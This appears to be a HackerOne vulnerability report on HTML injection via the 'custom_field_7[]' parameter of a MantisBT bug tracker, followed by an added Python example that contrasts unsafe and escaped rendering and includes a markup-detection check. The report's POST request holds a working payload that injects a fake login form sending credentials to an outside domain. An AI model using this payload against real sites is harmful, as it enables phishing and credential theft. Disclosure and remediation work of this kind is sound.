hackerone / Dragonjar / H1:903869
History: Jun 20, 2020 - 4:11 p.m.

Hanno's projects: [bugs.fuzzing-project.org] HTML Injection via 'custom_field_7[]' parameter in '/view_all_set.php'

2020-06-20 16:11:52
dragonjar
hackerone.com

Vulnerable Website URL or Application:

https://bugs.fuzzing-project.org/view_all_set.php?f=3

Description of Security Issue:

Because input entered in the custom_field_7[] field is not properly sanitized, an attacker could inject HTML into the page and send emails to company customers pointing to a legitimate fuzzing-project domain where they are prompted for data. The chance of successful phishing is excellent because the injected form sits within the company's own domain.

Please provide an exploit scenario for this vulnerability:

This could be a form where information is requested and then sent to an external domain.

{F876158}

POST /view_all_set.php?f=3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: https://bugs.fuzzing-project.org/
Cookie: MANTIS_secure_session=0;MANTIS_collapse_settings=|sidebar:1|filter:1;PHPSESSID=1495fp23866b0m12bi541et8c7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1947
Host: bugs.fuzzing-project.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

category_id[]=0&custom_field_1[]=0&custom_field_2[]=0&custom_field_3[]=0&custom_field_4[]=0&custom_field_5[]=0&custom_field_6[]=0&custom_field_7[]=0'"()%26%25"'</td>--&gt;<div><div><div><div><h4><i></i>Inicio de sesión</h4><div></div>&lt;form id="login-form" method="post" action="https://www.dragonjar.org"&gt;&lt;fieldset&gt;&lt;label for="username" class="block clearfix"&gt;<span>&lt;input id="username" name="username" type="text" placeholder="Nombre de usuario"   size="32" maxlength="191" value=""   class="form-control autofocus"&gt;<i></i></span>&lt;/label&gt;&lt;label for="password" class="block clearfix"&gt;<span>&lt;input id="password" name="password" type="password" placeholder="Contraseña" size="32" maxlength="1024" class="form-control autofocus"&gt;<i></i></span>&lt;/label&gt;<div></div>&lt;input type="submit" class="width-40 pull-right btn btn-success btn-inverse bigger-110" value="Iniciar sesión" /&gt;&lt;/fieldset&gt;&lt;/form&gt;</div>
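The root cause described above is a filter value that is echoed into the page without HTML encoding. The following Python example (added here; it is not MantisBT code and does not reproduce Mantis's templates) shows the defect and the fix side by side: an unescaped rendering of the parameter value turns it into live markup (a `form` element), while `html.escape` leaves it as inert text. It also includes a small triage check that flags form-encoded request parameters whose decoded values contain tag-like content, which is useful when reviewing logs or writing a WAF rule for the `custom_field_*[]` parameters. The request body, template and the `example.invalid` host are constructed for illustration.

```python
"""Reflected HTML injection: unsafe vs. escaped rendering, plus a request-body check.

Added example (not MantisBT code). The template, the sample request body and
the example.invalid host are constructed for illustration.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample body: two benign filter values and one carrying markup
# (the markup is URL-encoded exactly as a browser would send it).
SAMPLE_BODY = (
    "category_id[]=0&custom_field_6[]=0"
    "&custom_field_7[]=0%3Cform+action%3D%22https%3A%2F%2Fexample.invalid%22%3E"
    "%3Cinput+name%3D%22username%22%3E%3C%2Fform%3E"
)


class TagCounter(HTMLParser):
    """Records start tags in a rendered fragment so we can tell whether
    user-supplied text became real markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def count_tags(fragment, tag):
    """Number of <tag> start tags the browser's parser would see in fragment."""
    parser = TagCounter()
    parser.feed(fragment)
    return parser.tags.count(tag)


def render_unsafe(value):
    # The defect: the filter value is concatenated into the page verbatim.
    return "<td>" + value + "</td>"


def render_safe(value):
    # The fix: HTML-encode the value for the element-content context.
    return "<td>" + html.escape(value, quote=True) + "</td>"


def flag_markup_fields(body):
    """Return the parameter names whose decoded values contain something that
    looks like a tag, whether raw or entity-encoded. Intended as a log or WAF
    triage check, not as a substitute for output encoding."""
    flagged = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            decoded = html.unescape(v)
            if "<" in decoded and ">" in decoded:
                flagged.append(name)
                break
    return flagged


if __name__ == "__main__":
    injected = parse_qs(SAMPLE_BODY)["custom_field_7[]"][0]
    print("form elements, unsafe rendering:", count_tags(render_unsafe(injected), "form"))
    print("form elements, escaped rendering:", count_tags(render_safe(injected), "form"))
    print("parameters carrying markup:", flag_markup_fields(SAMPLE_BODY))
```

Running the script prints one `form` element for the unsafe rendering, zero for the escaped one, and `['custom_field_7[]']` as the flagged parameter. The fix belongs at the output stage (encode for the HTML context the value lands in); the triage check is only a signal, because the same value is legitimate input in a free-text field and a false negative is easy to craft.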